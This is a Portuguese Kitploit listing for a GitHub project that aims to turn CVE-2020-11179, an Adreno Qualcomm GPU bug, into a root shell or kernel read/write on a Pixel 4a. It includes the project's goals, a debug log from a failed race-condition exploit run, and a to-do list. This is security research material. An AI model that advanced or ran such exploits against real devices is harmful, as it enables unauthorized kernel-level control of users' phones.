Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/sparrow-labz/cve-2020-11179-adreno-qualcomm-gpu
Segurança AndroidEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoSegurança MóvelSegurança de HardwareExploração de Binários
GitHubsparrow-labz/cve-2020-11179-adreno-qualcomm-gpu

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-11179-Adreno-Qualcomm-GPU

Esforços de produtização do bug CVE-2020-11179 Adreno-Qualcomm-GPU, PoC original por Ben Hawkes da P0

Ver Repositório
7315há 1 anoAinda não revisado

Meu trabalho independente a partir do PoC criado pelo pesquisador da P0 Ben Hawkes
Artigo original: https://googleprojectzero.blogspot.com/2020/09/attacking-qualcomm-adreno-gpu.html

Meu objetivo é converter o PoC dele para C e continuar de onde ele parou e transformar o PoC em um shell root,
ou em um r/w de kernel, e então alterar o sistema de alguma forma para demonstrar execução de código no kernel.

  • muito provavelmente, o offset para ttbr0 é diferente no meu telefone de teste
  • precisa ser calculado e depurado para encontrar o offset

sunfish:/data/local/tmp $ ./adrenaline 0xfc45c000
main: rptr is passed as 0xfc45c000
main: rptr base is 0xfc45c000
adrenaline: starting adrenaline
parent: starting adrenaline_parent
child: starting adrenaline_child
parent: kick off the wait command, and follow it with the correct amount of alignment nops
parent: send a message to our child process, which will kick off a GPU context switch
parent: wait for confirmation that the context switch is in before proceeding
child: recive 6 inf pipe buff, and kick off a GPU context switch
child: let the parent process know that the context switch has been dispatched
parent: fill up the rest of ringbuffer 0
parent: signal the wait command to progress to scratch buffer rptr corruption
parent: scratch buffer rptr corrupt with AAAA
00000000 41 41 41 41 00 00 00 00 00 00 00 00 00 00 00 00 |AAAA............|
parent: exploit payload buffer
00000000 41 41 41 41 42 42 42 42 00 00 00 00 00 00 00 00 |AAAABBBB........|
adrenaline race lost: context id: (15), rptr_base: (0xfc45c000) -- try again \

dispositivo de teste: pixel 4a
android 10 na build QD4A.2000317.027

A FAZER:

  • trabalhar na troca de contexto e na condição de corrida
  • para alcançar execução de código no kernel
Baixar ferramenta